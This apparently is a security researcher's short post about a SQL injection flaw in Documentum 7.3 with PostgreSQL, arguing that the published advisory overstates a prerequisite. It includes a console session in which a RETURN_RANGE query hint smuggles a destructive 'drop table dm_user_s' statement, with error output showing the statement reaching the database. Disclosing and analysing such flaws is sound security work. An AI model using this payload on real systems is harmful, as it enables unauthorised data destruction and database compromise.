Four months ago I disclosed a vulnerability in Documentum 7.3/PostgreSQL, which allows attacker to execute arbitrary SQL statements, interesting thing here is vulnerability description is bit wrong, i.e. prerequisite “return_top_results_row_based config option is set to false” is not required:
Connected to Documentum Server running Release 7.3.0010.0013 Linux64.Postgres Session id is s0 API> ?,c,select count(*) from dm_user ENABLE (RETURN_RANGE 1 10 '1;drop table dm_user_s;') [DM_QUERY_E_INVALID_POSITION]error: "The ORDER BY position number 1;drop table dm_user_s; is out of range of the number of items in the select list." API> ?,c,select count(*) from dm_user ENABLE (OBJECT_BASED,RETURN_RANGE 1 10 '1;drop table dm_user_s;') [DM_QUERY_E_CURSOR_ERROR]error: "A database error has occurred during the creation of a cursor (' STATE=2BP01, CODE=7, MSG=ERROR: cannot drop table dm_user_s because other objects depend on it; Error while executing the query')."
What is OBJECT_BASED hint?